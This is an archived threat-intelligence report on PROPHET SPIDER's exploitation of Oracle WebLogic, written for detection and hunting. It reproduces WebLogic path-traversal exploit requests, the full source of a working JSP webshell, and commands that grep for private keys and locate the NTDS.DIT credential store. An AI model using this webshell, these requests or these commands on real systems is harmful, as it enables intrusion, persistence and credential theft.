{
	"id": "e3556aad-b9de-43e0-b5f9-4b10c6d7265b",
	"created_at": "2026-04-06T00:18:31.665128Z",
	"updated_at": "2026-04-10T03:28:33.595803Z",
	"deleted_at": null,
	"sha1_hash": "139cc895f32d47164b1b03cbe333ca16171532e0",
	"title": "How PROPHET SPIDER Exploits Oracle WebLogic | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 201351,
	"plain_text": "How PROPHET SPIDER Exploits Oracle WebLogic | CrowdStrike\r\nBy Falcon OverWatch - CrowdStrike Intelligence - CrowdStrike IR\r\nArchived: 2026-04-05 15:04:37 UTC\r\nCrowdStrike Intelligence, Falcon OverWatch™ and CrowdStrike Incident Response teams have observed\r\nmultiple campaigns by the eCrime actor PROPHET SPIDER where the adversary has exploited Oracle\r\nWebLogic using CVE-2020-14882 and CVE-2020-14750 directory traversal Remote Code Execution\r\n(RCE) vulnerabilities.\r\nPROPHET SPIDER is proficient in exploiting and operating in both Linux and Windows platforms.\r\nIt is likely PROPHET SPIDER monetizes access to victim environments by handing off access to third\r\nparties that will deploy ransomware.\r\nBackground\r\nPROPHET SPIDER is an eCrime actor that has been active since at least May 2017. PROPHET SPIDER\r\nprimarily gains access to victims by compromising vulnerable web servers, and uses a variety of low-prevalence\r\ntools to achieve operational objectives, including the GOTROJ remote access trojan and a variety of reverse shell\r\nbinaries. This blog focuses on PROPHET SPIDER’s recent trend of leveraging CVE-2020-14882 and CVE-2020-\r\n14750 to exploit unpatched Oracle WebLogic servers to gain initial access to victim environments. The blog also\r\ndiscusses PROPHET SPIDER’s observed tactics on Windows and Linux systems, and their victim environment\r\naccess handoff operations to multiple adversary groups for ransomware deployment.\r\nOracle WebLogic Exploitation\r\nPROPHET SPIDER typically gains initial access via the exploitation of public-facing applications. In particular,\r\nCrowdStrike has observed PROPHET SPIDER exploit Oracle WebLogic vulnerabilities to gain access to victim\r\nenvironments. A commonly observed avenue is the exploitation of two WebLogic CVEs: CVE-2020-14882 and\r\nCVE-2020-14750. Both CVEs are related to path traversal vulnerabilities that allow an adversary access to the\r\nWebLogic administrative console, which consequently allows for unauthenticated remote code execution, or RCE.\r\n(Note: Both vulnerabilities are essentially the same; the patch initially released to address CVE-2020-14882 in\r\nOctober 2020 was bypassed shortly after. The patch for CVE-2020-14750 resolved the issue in a more\r\ncomprehensive manner.) While the two WebLogic CVEs are the most commonly observed avenues of initial\r\naccess, CrowdStrike has also observed PROPHET SPIDER exploit older Oracle CVEs, including CVE-2016-\r\n0545, as well as perform SQL injection to gain access. CrowdStrike has not observed PROPHET SPIDER gain\r\ninitial access via other methods such as phishing, brute forcing, malvertising or drive-by downloads. CrowdStrike\r\nhas observed PROPHET SPIDER conduct external reconnaissance scans to determine if a target is vulnerable to a\r\nWebLogic CVE using the website burpcollaborator\u003c.\u003enet . This is a legitimate website that can be used in\r\nconjunction with BurpSuite to send RCE command responses in blind injection-style attacks. For example, a\r\nCVE-2020-14882/CVE-2020-14750 request involving burpcollaborator\u003c.\u003enet may look like the below, where\r\nan nslookup is performed on a subdomain of burpcollaborator\u003c.\u003enet .\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/\r\nPage 1 of 10\n\nGET /console/images/%252e%252e%252fconsole.portal?_nfpb=false\u0026amp;_pageLabel=\u0026amp;handle=com.tangosol.coherence\r\nFigure 1. WebLogic access log showing the nslookup command executed on a subdomain of\r\nburpcollaborator\u003c.\u003enet Analysts looking for evidence of attempted exploitation of CVE-2020-14882 and/or\r\nCVE-2020-14750 can examine WebLogic access logs for path traversal requests that reference the URI\r\nconsole.portal. The requests will involve encoding the characters “../” in some manner. This may look like the\r\nexamples below:\r\nGET /console/images/%252E%252E%252Fconsole.portal\r\nGET /console/css/%252e%252e%252fconsole.portal\r\nGET /console/..%2Fconsole.portal\r\nFigure 2. WebLogic access log showing directory traversal requests that reference console.portal, indicative\r\nof attempted exploitation of CVE-2020-14882/14750 There are multiple avenues to achieve RCE following the\r\nsuccessful path traversal request. In some cases, the GET request will contain additional parameters that include\r\nthe RCE command. In the example below, the com.tangosol.coherence.mvel2.sh.ShellSession class is invoked to\r\nexecute a curl command.\r\nGET /console/images/%252E%252E%252Fconsole.portal?_nfpb=false\u0026amp;_pageLabel=HomePage1\u0026amp;handle=com.tangosol\r\nFigure 3. WebLogic access log showing the curl command executed via the\r\ntangosol.coherence.mvel2.sh.ShellSession class Another similar exploitation request PROPHET SPIDER has\r\nused leverages ClassPathXmlApplicationContext or FileSystemXmlApplicaitonContext to achieve execution\r\nvia a remotely hosted XML file. The remote URLs referenced in the below figure would host an XML file that\r\ncontains the command to execute.\r\nGET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true\u0026amp;_pageLabel=HomePage1\u0026amp;handle=com.bea.core.r\r\nGET /console/images/%252E%252E%252Fconsole.portal?handle=com.bea.core.repackaged.springframework.context.suppor\r\nFigure 4. WebLogic access log showing ClassPathXmlApplicationContext or\r\nFileSystemXmlApplicaitonContext classes leveraged to execute commands via a remotely hosted XML file\r\nIt is also possible to gain access without having the RCE command or XML file visible in the GET request. By\r\nexamining backend logs on the WebLogic server and correlating them with the access logs, analysts may see path\r\ntraversal requests that line up with errors related to com.tangosol.coherence.mvel2.sh.ShellSession. For\r\nexample:\r\n2021-02-15 02:12:12 0.001 1164 GET /console/..%2Fconsole.portal?_nfpb=true\u0026amp;_pageLabel=UnexpectedExceptionPa\r\n####\u003cFeb 15, 2021, 02:12:13,361 AM EST\u003e \u003c …\u003e Administration Console encountered the following error: Unexpected\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/\r\nPage 2 of 10\n\nFigure 5. WebLogic access log showing directory traversal activity that correlates to a WebLogic console log\r\nerror for com.tangosol.coherence.mvel2.sh.ShellSession Analysts may also observe failed RCE on Linux\r\nsystems that attempt to execute a Windows-based command, and vice versa — an indication of the widespread\r\ntargeting of this exploit’s vulnerability.\r\nLinux Tactics\r\nSince PROPHET SPIDER gains access via web servers or other public-facing servers, they will often initially\r\ncompromise a Linux-based system. Once initial access is obtained on a Linux system, PROPHET SPIDER\r\ntypically deploys a webshell, reverse shell binary or a perl reverse shell script (commonly named bc.pl ) as their\r\ninitial persistence mechanism. PROPHET SPIDER demonstrates a good understanding of the Linux command\r\nshell and uses a wide range of commands to enumerate system process, account and networking information.\r\nPersistence\r\nFigure 6 below contains a sample JSP webshell leveraged by PROPHET SPIDER on an Oracle WebLogic server\r\nused as a persistence mechanism that allowed for access and remote commands to be issued on the system.\r\n\u003c\r\n% !String middleware = \"517c7dcfd19771f1\";\r\nString pass = \"3626708ee86f82d0493e684e1f400787\";\r\nString md5 = md5(pass + middleware);\r\nclass X extends ClassLoader {\r\npublic X(ClassLoader z) {\r\nsuper(z);\r\n}\r\npublic Class Q(byte\u003c\u003e cb) {\r\nreturn super.defineClass(cb, 0, cb.length);\r\n}\r\n}\r\npublic byte\u003c\u003e x(byte\u003c\u003e s, boolean m) {\r\ntry {\r\njavax.crypto.Cipher c = javax.crypto.Cipher.getInstance(\"AES\");\r\nc.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(middleware.getBytes(), \"AES\"));\r\nreturn c.doFinal(s);\r\n} catch (Exception e) {\r\nreturn null;\r\n}\r\n}\r\npublic static String md5(String s) {\r\nString ret = null;\r\ntry {\r\njava.security.MessageDigest m;\r\nm = java.security.MessageDigest.getInstance(\"MD5\");\r\nm.update(s.getBytes(), 0, s.length());\r\nret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/\r\nPage 3 of 10\n\n} catch (Exception e) {}\r\nreturn ret;\r\n}\r\npublic static String base64Encode(byte\u003c\u003e bs) throws Exception {\r\nClass base64;\r\nString value = null;\r\ntry {\r\nbase64 = Class.forName(\"java.util.Base64\");\r\nObject Encoder = base64.getMethod(\"getEncoder\", null).invoke(base64, null);\r\nvalue = (String) Encoder.getClass().getMethod(\"encodeToString\", new Class\u003c\u003e {\r\nbyte\u003c\u003e.class\r\n}).invoke(Encoder, new Object\u003c\u003e {\r\nbs\r\n});\r\n} catch (Exception e) {\r\ntry {\r\nbase64 = Class.forName(\"sun.misc.BASE64Encoder\");\r\nObject Encoder = base64.newInstance();\r\nvalue = (String) Encoder.getClass().getMethod(\"encode\", new Class\u003c\u003e {\r\nbyte\u003c\u003e.class\r\n}).invoke(Encoder, new Object\u003c\u003e {\r\nbs\r\n});\r\nvalue = value.replace(\"\\n\", \"\").replace(\"\\r\", \"\");\r\n} catch (Exception e2) {}\r\n}\r\nreturn value;\r\n}\r\npublic static byte\u003c\u003e base64Decode(String bs) throws Exception {\r\nClass base64;\r\nbyte\u003c\u003e value = null;\r\ntry {\r\nbase64 = Class.forName(\"java.util.Base64\");\r\nObject decoder = base64.getMethod(\"getDecoder\", null).invoke(base64, null);\r\nvalue = (byte\u003c\u003e) decoder.getClass().getMethod(\"decode\", new Class\u003c\u003e {\r\nString.class\r\n}).invoke(decoder, new Object\u003c\u003e {\r\nbs\r\n});\r\n} catch (Exception e) {\r\ntry {\r\nbase64 = Class.forName(\"sun.misc.BASE64Decoder\");\r\nObject decoder = base64.newInstance();\r\nvalue = (byte\u003c\u003e) decoder.getClass().getMethod(\"decodeBuffer\", new Class\u003c\u003e {\r\nString.class\r\n}).invoke(decoder, new Object\u003c\u003e {\r\nbs\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/\r\nPage 4 of 10\n\n});\r\n} catch (Exception e2) {}\r\n}\r\nreturn value;\r\n} % \u003e\r\n\u003c\r\n%\r\ntry {\r\nbyte\u003c\u003e data = base64Decode(request.getParameter(pass));\r\ndata = x(data, false);\r\nif (session.getAttribute(\"payload\") == null) {\r\nsession.setAttribute(\"payload\", new X(pageContext.getClass().getClassLoader()).Q(data));\r\n} else {\r\nrequest.setAttribute(\"parameters\", new String(data));\r\nObject f = ((Class) session.getAttribute(\"payload\")).newInstance();\r\nf.equals(pageContext);\r\nresponse.getWriter().write(md5.substring(0, 16));\r\nresponse.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));\r\nresponse.getWriter().write(md5.substring(16));\r\n}\r\n} catch (Exception e) {} % \u003e\r\nFigure 6. A sample JSP webshell leveraged by PROPHET SPIDER on an Oracle WebLogic server for\r\npersistence\r\nCredential Access\r\nOn Linux-based systems, PROPHET SPIDER attempts to harvest information relating to SSH keys, and RSA\r\nkeys generally, using cat to list the contents of id_rsa , id_dsa , or . ssh/authorized_keys . In one case,\r\nPROPHET SPIDER used grep to search for private keys stored in files across various directories, including\r\nroot , home , etc , and mnt , for example: timeout 40 grep -rl \\-\\-\\-\\-\\-BEGIN .* PRIVATE KEY.*\\-\\-\\-\r\n\\-\\- /home .\r\nLateral Movement\r\nTo enable lateral movement, the adversary uses ping and nslookup commands, in addition to scanning the\r\nenvironment for Windows systems listening on port 445. This is done using a simple port scanning binary unique\r\nto PROPHET SPIDER, typically named pscan or pscan2. For example, process logging may reveal similar\r\ncommands to the below. Note the commands are executed by the oracle user account, which is the user that runs\r\nWebLogic. In multiple PROPHET SPIDER cases, CrowdStrike observed a reverse shell binary located at\r\n/var/tmp/, which launches bash as a child; and the pscan2 command is a child to bash. The reverse shell is a\r\nchild to PID 1, which indicates it was either executed via an init script created for persistence, or its parent was\r\nterminated causing it to become a zombie process that was reaped by the init daemon.\r\nUSER PID PPID COMMAND\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/\r\nPage 5 of 10\n\noracle 4210 1 /var/tmp/\r\noracle 4211 4210 bash\r\noracle 5732 4211 ./pscan2 10.10.20.0 10.10.20.255 445 \u003coutput file\u003e\r\nFigure 7. Example process listing showing PROPHET SPIDER invoked processes running on a Linux\r\nsystem under the oracle account\r\nAnti-forensics Activity\r\nPROPHET SPIDER commonly deletes their tools after use using rm , clears the bash HISTFILE environment\r\nvariable and has used a custom ELF binary for clearing logs on Linux devices. PROPHET SPIDER typically\r\ncompresses SSH key information into 7-Zip or TAR archives. In contrast to many other actors using existing\r\nRemote Access Tool (RAT) C2 channels for exfiltration, PROPHET SPIDER uses File Transfer Protocol (FTP) or\r\nPSCP to exfiltrate archived key information.\r\nLinux to Windows Transition\r\nIn some cases, PROPHET SPIDER initially compromises a Windows-based system. However, CrowdStrike has\r\ntypically observed PROPHET SPIDER initially compromise a Linux system and then move into a victim’s\r\nWindows-based environment using compromised credentials via Telnet, SSH or SMB. In multiple cases,\r\nCrowdStrike observed PROPHET SPIDER leveraged a SOCKS proxy tool (typically named auditd) that allowed\r\nfor lateral movement into the victim’s Windows environment without having to execute additional programs on\r\nthe compromised Linux system. In some cases, PROPHET SPIDER deployed the WinExe tool, which allows a\r\nLinux system to execute commands remotely on a Windows system. CrowdStrike has observed multiple incidents\r\nwhere the WinExe binary was named wmhost.exe, and the service it created on remote systems to achieve\r\nexecution was named wmhost. CrowdStrike has also observed PROPHET SPIDER execute a ZeroLogon (CVE-2020-1472) exploit binary from Linux targeting the victim’s Windows environment. Analysts should watch for a\r\nlarge number of failed logins, or anonymous logons, originating from the Linux system targeting Windows\r\nsystems. Special attention should be paid to any legacy systems such as Windows Server 2003 that may exist in\r\nthe environment, as these can be easier targets for initial lateral movement.\r\nWindows Tactics\r\nPROPHET SPIDER typically uses PowerShell to download Wget, typically downloading Wget to\r\nC:\\Windows\\Temp\\7fde\\wget.bin as the first post-compromise action on a Windows server running Oracle\r\nWebLogic. The adversary then uses Wget to download additional utilities such as 7zip to\r\nC:\\Windows\\Temp\\7fde\\7z.bin and additional malware, such as the GOTROJ backdoor, reverse shell binaries, or\r\na SOCKS proxy tool. CrowdStrike has observed PROPHET SPIDER consistently use the directory\r\nC:\\Windows\\Temp\\7fde\\ to store tools. The adversary commonly creates Windows services, e.g. WindowsNTApp\r\nfor GOTROJ, to establish persistence for downloaded malware.\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/\r\nPage 6 of 10\n\n(Click to enlarge)\r\nFigure 8. Process tree resulting from PROPHET SPIDER targeting a Windows-based WebLogic server,\r\nhighlighting their use of wget.bin and 7z.bin . In one case after initial access and persistence was gained\r\nthrough the use of a common JSP webshell, PROPHET SPIDER deployed a JSP SOCKS proxy known as reGeorg\r\nto the external facing compromised Oracle WebLogic system. The adversary leveraged the proxy and the renamed\r\nWinExe binary to move laterally to other systems in the network and perform initial network and active directory\r\nreconnaissance. Analysts should look for source network workstation name mismatches in Windows\r\nauthentications logs, as it was discovered the adversary’s workstation name was captured likely due to the use of\r\nthe proxy.\r\nCredential Access\r\nOn Windows, PROPHET SPIDER uses vssadmin.exe to obtain Security Account Manager (SAM) and system\r\ncredential stores. The adversary has also deployed Mimikatz binaries to dump credentials stored in system\r\nmemory. PROPHET SPIDER consistently attempts to obtain NTDS.DIT, the active directory database, typically\r\nusing vssadmin.exe for this purpose. To support credential dumping, PROPHET SPIDER uses\r\nreg query \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters\"\r\nto identify where NTDS.DIT is located.\r\nData Staging and Exfiltration\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/\r\nPage 7 of 10\n\nAfter gaining access to victim domain controllers, the adversary rapidly introduces additional tooling (7zip,\r\nPSCP/FTP), harvests credential stores, compresses files and then exfiltrates them to a remote IP address using\r\nPSCP or FTP.\r\nAccess Broker and Handoff Tradecraft Observations\r\nIn at least two separate cases, PROPHET SPIDER infections have resulted in ransomware deployment, likely\r\nfrom separate adversary groups. In a 2020 campaign, PROPHET SPIDER did not immediately operationalize a\r\nbreach of an Apache web server. Several months later, an unattributed adversary leveraged this access, conducting\r\ninternal reconnaissance followed by Cobalt Strike deployment, AD enumeration using AdFind and exfiltration\r\nusing WinSCP. This activity was followed by deployment of Egregor ransomware across the environment, and\r\nvictim data was later posted to the Egregor dedicated leak site. In a 2021 campaign, two weeks after PROPHET\r\nSPIDER ceased interactive operations, an unattributed actor downloaded a Cobalt Strike stager DLL from a\r\nremote IP address. When run with the argument 11985756 , the DLL downloaded a Cobalt Strike payload. The\r\nadversary used ADFind to enumerate Active Directory, then moved laterally, using a compromised administrative\r\naccount, and downloading additional Cobalt Strike Beacon payloads onto some systems, or using PSExec to run\r\nCobalt Strike. The adversary further used PowerSploit to enumerate the victim environment. Before deploying\r\nransomware, the adversary staged data in ZIP archives and likely exfiltrated these archives. Batch scripts\r\nsubsequently deployed MountLocker across the victim environment. While there are multiple potential hypotheses\r\nfor this activity, including PROPHET SPIDER operators deploying ransomware, CrowdStrike Intelligence\r\nassesses that the most likely explanation is that PROPHET SPIDER functioned as an access broker. PROPHET\r\nSPIDER likely granted access to Egregor and MountLocker operators respectively in exchange for payment. This\r\nassessment carries low confidence (see the end of this blog for an explanation of confidence rating), reflecting\r\nseveral factors:\r\nNo other Egregor or MountLocker cases involved PROPHET SPIDER TTPs or artifacts\r\nPROPHET SPIDER’s TTPs differ significantly from TTPs commonly observed in Egregor and\r\nMountLocker campaigns; for instance, PROPHET SPIDER does not normally use Cobalt Strike\r\nMany ransomware operators are known to purchase access to victims via access brokers\r\nRecommendations\r\nThe best defense against opportunistic attacks by access brokers such as PROPHET SPIDER is to ensure your\r\nexternally facing servers are fully patched. However, preventative measures are not a silver bullet. Adversaries\r\nmay be able to bypass even robust and secure perimeters using a variety of techniques. Therefore, proactive threat\r\nhunting such as what Falcon OverWatch provides is also essential. When threat hunters are effectively scouring\r\nyour network for even the most subtle clues of a potential adversary presence, they can quickly home in on\r\nunusual behaviors like the living-off-the-land discovery actions that PROPHET SPIDER commonly leverages\r\nwhen they initially gain access. In addition to hunting for unexpected reconnaissance, defenders should also\r\nmonitor their environment for potentially malicious ingress tool transfer. To do so, continually monitor for\r\nunexpected processes retrieving files from external servers as well as uncommon network data flows. Lastly,\r\ndefenders should hunt for malicious and/or anomalous use of legitimate tools, as legacy antivirus products\r\ntypically will not block these tools because of their common and legitimate usage.\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/\r\nPage 8 of 10\n\nIndicators of Compromise\r\nDescription Hashes\r\nGOTROJ\r\nSHA256\r\nhashes\r\n2b03806939d1171f063ba8d14c3b10622edb5732e4f78dc4fe3eac98b56e5d46\r\n55320dcb7e9e96d2723176c22483a81d47887c4c6ddf063dbf72b3bea5b279e3\r\n57150938be45c4d9c742ab24c693acc14cc071d23b088a1facc2a7512af89414\r\n9d42c2b6a10866842cbb6ab455ee2c3108e79fecbffb72eaf13f05215a826765\r\nJSP Webshell\r\nSHA256\r\nhashes\r\nbb86dcfb6bca5fba8ab92d7a4ded9599baab400804c5fe5fb37aaef75f15e0ac\r\n938804d619e2c7d2e3c31f1479574cbb8c85db14d3b5f0c70ccc22d4599f4ff7\r\nMITRE ATT\u0026CK® Observed Tactics\r\nTactic Description\r\nReconnaissance\r\nT1590: Gather Victim Network Information T1595.002: Active Scanning: Vulnerability\r\nScanning\r\nInitial Access T1190: Exploit Public-Facing Application\r\nPersistence T1505.003: Server Software Component: Web Shell\r\nCredential Access T1003.003: OS Credential Dumping: NTDS\r\nLateral\r\nMovement\r\nT1021: Remote Services\r\nDefense Evasion T1070.003: Indicator Removal on Host: Clear Command History\r\nExplanation of Confidence Rating\r\nHigh Confidence: Judgments are based on high-quality information from multiple sources. High confidence in\r\nthe quality and quantity of source information supporting a judgment does not imply that that assessment is an\r\nabsolute certainty or fact. The judgment still has a marginal probability of being inaccurate. Moderate\r\nConfidence: Judgments are based on information that is credibly sourced and plausible, but not of sufficient\r\nquantity or corroborated sufficiently to warrant a higher level of confidence. This level of confidence is used to\r\nexpress that judgments carry an increased probability of being incorrect until more information is available or\r\ncorroborated. Low Confidence: Judgments are made where the credibility of the source is uncertain, the\r\ninformation is too fragmented or poorly corroborated enough to make solid analytic inferences, or the reliability of\r\nthe source is untested. Further information is needed for corroboration of the information or to fill known\r\nintelligence gaps.\r\nAdditional Resources\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/\r\nPage 9 of 10\n\nTo learn more about how to incorporate intelligence on threat actors into your security strategy, visit\r\ntheCROWDSTRIKE FALCON® INTELLIGENCE™ Premium Threat Intelligence page.\r\nVisit the CrowdStrike website to learn more aboutCrowdStrike Services and Falcon OverWatch offerings.\r\nLearn more on how Falcon Spotlight™ can help you discover and manage vulnerabilities in your\r\nenvironments.\r\nGet a full-featured free trial of CrowdStrike Falcon® Prevent™and learn how true next-gen AV performs\r\nagainst today’s most sophisticated threats.\r\nSource: https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/"
	],
	"report_names": [
		"prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity"
	],
	"threat_actors": [
		{
			"id": "056826cb-6e17-4954-a9b4-2cc8c6ae3cb8",
			"created_at": "2023-03-04T02:01:54.115678Z",
			"updated_at": "2026-04-10T02:00:03.360898Z",
			"deleted_at": null,
			"main_name": "Prophet Spider",
			"aliases": [
				"GOLD MELODY",
				"UNC961"
			],
			"source_name": "MISPGALAXY:Prophet Spider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "47b52642-e5b8-4502-b714-b625002d86aa",
			"created_at": "2024-06-19T02:03:08.086579Z",
			"updated_at": "2026-04-10T02:00:03.812509Z",
			"deleted_at": null,
			"main_name": "GOLD MELODY",
			"aliases": [
				"PROPHET SPIDER",
				"UNC961"
			],
			"source_name": "Secureworks:GOLD MELODY",
			"tools": [
				"7-Zip",
				"AUDITUNNEL",
				"BURP Suite",
				"GOTROJ",
				"JSP webshells",
				"Mimikatz",
				"Wget"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434711,
	"ts_updated_at": 1775791713,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/139cc895f32d47164b1b03cbe333ca16171532e0.pdf",
		"text": "https://archive.orkl.eu/139cc895f32d47164b1b03cbe333ca16171532e0.txt",
		"img": "https://archive.orkl.eu/139cc895f32d47164b1b03cbe333ca16171532e0.jpg"
	}
}